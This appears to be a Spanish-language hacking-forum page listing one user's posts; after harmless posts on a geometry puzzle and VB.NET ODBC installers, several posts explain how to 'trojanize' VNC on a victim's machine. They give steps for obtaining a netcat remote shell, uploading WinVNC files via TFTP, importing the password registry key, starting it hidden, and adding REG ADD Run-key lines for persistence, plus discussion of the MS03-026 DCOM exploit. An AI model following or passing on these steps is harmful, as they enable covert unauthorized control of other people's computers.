Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Sir_Neo

#1
Habéis pensado en la tercera dimensión?

Con 1 linea divides el plano en dos partes.

Con 2 lineas divides el plano en 4 partes.

Con la linea 3, la cruzas con las otras dos pero en tercera dimensión, no se si me explico.


Dibujarlo es muy dificil, echarle imaginación.


                |       /
                |     /
                |   /
                | /
------------------------------
               /|
             /  |
           /    |
         /      |

Solución, tenemos 8 cuadros.

1 saludo.
#2
quizás esté mal que lo pida aquí en el foro el programa... si eso lo borro o q un moderador lo borre.

Estoy harto de buscar y buscar y no lo encuentro. En emule hay uno pero son 2 gigas y pico y lo necesito para ya.. de todas maneras lo estoy bajando. Yo tengo 1 ya pero me falla el cd de prerequities, esta malo. Asi que solo necesitaria ese cd, pero en español.

Si alguien sabe donde puedo descargarmelo ya sea descarga directa o no, q me lo diga... o si alguien lo tiene o algo para q se ponga en contacto conmigo. Se podria subir a un ftp o algo.

Gracias

#3
Creo que no me explique muy bien ....

Mi aplicacion se conecta a una base de datos MySql remota. Por lo q necsito instalar el ODBC en cada máquina.

Sé que el programa trae para meter los ODBC pero a mí me da error, algo falla.

De todas maneras, he leido por ahi, que se puede realizar la conexion a la BD MySql sin el ODBC, es con otros drivers... pero todavia no lo he probado.

#4
No se si he hecho bien en postear mi problema en este foro, pero como trata de VB pues lo pongo a ver si alguien sabe...

Estoy haciendo una aplicacion en VB .NET y voy a utilizar el INSTALL SHIELD express edition para hacer el paquete de instalación. Mi duda es que como puedo agregar el ODBC a mi instalador, para q me mire si esta el odbc instalado y sino lo está, q le diga al usuario q lo instale, y le muestre el instalador del ODBC o sino, q le meta los ficheros automaticamente.

Se q el programa viene preparado para eso, pero me da errores al instalar.

Un saludo.
#5
Este hilo no va de como obtener la shell remota, va sobre la configuracion del VNC para troyanizarlo. Si kieres obtener una shell pasate por la sección de exploits y leete el otro manual de Gospel que explica como explotar un bug.

RECOPILATORIO DE EXPLOITS [actualizado 10.08.04]
http://foro.elhacker.net/index.php/topic,32810.0.html

Como se Usan los Exploits?????
http://foro.elhacker.net/index.php/topic,11830.0.html

FAQ Exploits y Recopilacion de post interesantes sobre EXPLOITS. 19/8/04
http://foro.elhacker.net/index.php/topic,23643.0.html

El manual lo buscais ustedes que no lo encuentro ahora, quizás este dentro de uno de los enlaces que os paso.

Un Saludo, SirNeo
#6
Perdona Man-in-the-middle, pero he decidido escribir porque tus palabras son un poco dificiles de entender y para aquellos que no lo hayan entendido, traduzco  :D.

Cogemos el winvnc.exe y le cambiamos de extension de .exe a .zip. Normalmente, si descomprimios ahora, daría un error, pero no sucede eso, descomprime y suelta 6 o7 ficheros .class, que son los ficheros de java compilados. Luego tomamos el decafe pro demo, que es un programita que descompila ficheros de java, y ta chan!!! tenemos el codigo del winvnc. Como no deja copiar, lo unico que hay que hacer es escribir el codigo a pelo, y compilarlo de nuevo.

Por lo demás, corre cuenta de vuestra imaginación.

Un Saludo.
#7
Gospel:
Citar
Otro apunte.... si entro a través del exploit Dcom para MS03-026, no hace falta reiniciar el equipo... al terminar la sesión con netcat, cae el servicio RPC y produce un services crash q obliga al sistema a reiniciar tras la cuenta atrás...

No estoy de acuerdo contigo. Esa es la primera vulnerabiliad que trabaje cuando me inicié este mundillo, y probe varios.

No todos caen el servicio RPC, y el que hace caerlo no lo hace en todas las makinas.

Uno de ellos lo probe en 2 makinas que tenia vulnerables, y en el primero me salia una ventanita que decia que reiniciase, y en el otro no salía nada. En los dos casos me daba shell. Así que saco como conclusión, que dependerá de la makina. no se.

PD: Ya es que tengo los pcs parcheados, sino probaría de nuevo para confirmartelo.
#8
Ahi va mi manera:

- Consigo la shell remota dejando el netcat a la escucha en la victima.

- Instalo el winvnc en la makina del atacante.

- Le pongo el password. Cierro.

- Reemplazo el WinVnc no Tray por el normal.

- Cojo los ficheros WinVnc.exe, VNCHooks.dll (de ORL/VNC) y omnithread_rt.dll (de system32) y los coloco en una misma ubicación, por ejemplo "c:\h"

- Abro el regedit, busco winvnc, y encuentro una carpeta que tiene una clave llamada password. archivo -> exportar y le ponemos un nombre (ejempolo: vnc.reg). Lo colocamos en c:\h también.

- lanzamos el tftp32e.exe y le subimos los 4 ficheros estos en un mismo directorio. (en mi caso, en windows o system32, no ma cuerdo)

- ponemos "reg imort vnc.reg" y "start winvnc.exe".

- Luego ejecutamos en el atacante vncview, sale una ventanita pidiendo password (eso significa que hemos conectado), ponemos el pass y devuelve la pantalla.

- Tambien podemos añadir al registro para que se incie el winvnc cada vez q inicie la makina.

NOTA: No me ha hecho falta los demas registros.

NOTA2: Para no tener que llevarnos tanto tiempo con la shell abierta haciendo las cosas pertinentes, me tengo echo un bat con los comandos que hay que utilizar. Así solo subo el fichero bat, y una vez dentro, lo lanzamos, y todo listo en -1 segundo. jeje


Espero que os sirva de ayuda.

Suerte !!

#9
no estoy muy seguro, pero creo que en el manual de gospel no dice que tienes que tener instalado el server del TFTP, pq a mi me paso lo mismo, y estuve probando una y otra vez, hasta que me dijeron que necesitaba el server.

Bueno si lo nombra, pero dice que busques por el foro. bueno ahi te dejo algunos comentarios.

Te bajas el server q es solo un ejecutable, lo lanzas, y se te abre una ventanita. Entonces, es cuando ejecutas la linea q tu ya sabes, y mientras q sube el fichero, en la ventanita del server sale informacion del fichero (ya lo veras).

Como te ha dicho zhyzura, metes los ficheros que quieras subir en la misma carpeta que tienes puesto el server TFTP.

prueba y nos cuentas.

Un Saludo
#10
Gracias por tu aclaración zhyzura, pero ya se donde estaba el fallo.

Lo unico que falta es añadir a la victima las lineas del registro, no se si todas, por lo menos la del password y la que no muestra la ventana de propiedades.

y sobre esta linea, solo hacerte un comentario:
Citar
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\vnc\winvnc"

Esta linea ya la tienes posteada en otro post para indicar que se inicie el netcat, :P pero con su correspondiente linea de comandos. Se te olvido cambiar el nombre que le asignas al registro NetCat por uno más identificativo al winvnc.  8)

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinVnc /t REG_SZ /d "C:\vnc\winvnc"

Bueno, solo era eso, jeje, gracias de todas maneras por tu aportación, que siempre tas ahi dandome soluciones a mis dudas.